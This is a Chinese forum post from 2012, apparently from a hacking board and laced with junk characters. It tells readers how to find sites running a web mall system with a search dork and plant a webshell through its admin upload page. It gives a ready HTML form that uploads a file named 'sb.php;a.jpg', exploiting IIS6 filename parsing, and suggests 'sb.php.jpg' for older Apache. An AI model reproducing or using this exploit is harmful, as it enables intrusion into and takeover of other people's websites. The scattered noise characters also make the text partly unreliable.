关键字:inurl:webmall/detail.php?id2 @$ }) n- G3 }# r1 o6 U; x' m
) M E- d0 @) f, I* H7 _) m) U* a
数据表:pwn_base_admin' A; v5 b- C0 P
; a2 d& S# q; G% \1 o& i关于拿shell
' A: N" [8 e% n0 u( Q' o $ q1 s2 ~4 a5 T8 Z( S
首先登录后台admin.php# {( Z, z% d6 |6 [- ^ ~: [
9 t4 X* [ v) q8 p3 P/ Z3 [% y看了upload.php源码,分析了一个下午,然后大约是明白了虽然上传那里只允许上传gif,jpg,png,bmp四种文件,但是并没有对文件名做限制。
1 l. A4 G3 g& G* G/ Z* f7 y换句话说,sb.php;a.jpg这样的文件也是允许的,只要服务器是IIS6就拿到webshel,低版本的apache可以试着重命名为sb.php.jpg
+ t8 ~6 q6 n1 `+ U% A1 p; a! Z然后搞完了才发现,这里的比我的更精简,我那个蛋疼,膜拜下三石,然后就借用了,我的开始和他的一样是采取全部源码的,然后发现了更精简的1 V* I, Y& L: I
<form name="uploadForm" method="post" enctype="multipart/form-data" action="http://xxx.com/kedit/upload_cgi/upload.php"> . f) A8 ]% \% z4 ^' G4 B6 R$ L
<input type="text" name="fileName" value="sb.php;a.jpg" /> # J0 A* a/ b* i3 A/ U) Z# v6 X7 U
<input type="hidden" name="attachPath" value="news/pics/" />
0 C2 H3 S6 @. f<input type="file" name="fileData" size="14" /></td>
* [$ X" `# C; I: p<input type="submit" name="button" value="确定" />
7 p9 s/ b( K. p% @. Q</form>
/ X+ N9 @- k# x; x! B, L j4 ^8 U
+ H m6 g& s) J9 o0 n0 x首先登录后台,然后把上面的文件保存为xx.html,修改action,然后再上传,如果为iis6就在上传了查看源码就好了。. g* q ^7 a+ q
/ I4 ~6 q3 C6 K0 x7 e |
发表于 2012-11-9 20:52:15
收藏
支持
反对